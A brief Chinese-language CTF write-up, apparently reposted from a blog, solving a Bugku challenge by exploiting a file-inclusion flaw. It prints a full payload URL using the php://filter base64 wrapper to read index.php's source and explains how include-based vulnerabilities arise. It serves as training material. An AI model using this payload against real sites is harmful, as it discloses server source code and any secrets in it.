題目來源：https://ctf.bugku.com/challenges

點擊click me?no 之后url變成了這樣

出現了 file=show.php，說明可能有文件包含漏洞，

所以構建url：

http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

得到一串base64，通過在線解碼，得到flag：

總結：

這道題是利用了文件包含漏洞讀取網頁代碼，文件包含漏洞是指網頁后端php（或其他）代碼中使用了include等文件包含語句，而且所包含的文件由變量控制，恰恰此變量又能通過GET或POST等方式進行修改所造成的。

總結

以上是生活随笔為你收集整理的bugkuCTF---flag在index里的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。